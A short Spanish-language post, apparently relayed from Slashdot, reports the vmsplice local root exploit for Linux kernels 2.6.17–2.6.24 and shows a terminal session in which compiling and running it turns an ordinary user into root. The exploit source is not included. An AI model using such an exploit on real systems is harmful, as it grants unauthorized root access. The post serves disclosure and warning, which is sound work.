Este exploit afecta al Kernel Linux versión 2.6 de Ubuntu y Debian, el exploit es necesario ejecutarlo como usuario local, para así obtener identidad de root.
Los Kernel Linux afectados son desde la versión 2.6.17 hasta 2.6.24. Por el momento para solucionar el problema de seguridad, habría que compilar nuestro propio kernel eliminando vmsplice.
Pruebas hechas en Ubuntu apuntan a que funciona perfectamente en un Kernel 2.6.22-14-generic:
$ gcc exploit.c -o exploit
$ whoami
heikki
$ ./exploit
-------
------- ------- ------- -------
Linux vmsplice Local Root Exploit
By qaaz
-------------- ------- ------- -------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7d90000 .. 0xb7dc2000
[+] root
$ whoami
root
El software libre tiene sus pro y sus contras, lo bueno en este caso es que los detalles y la forma de solucionar el problema es ya conocido y se encuentra al alcance nuestro, pero lo negativo es que se dispone del exploit y los detalles en cuestión, el cual además son de muy fácil implementación para un usuario malicioso del sistema Linux afectado.
Linux Kernel 2.6 Local Root Exploit | Slashdot
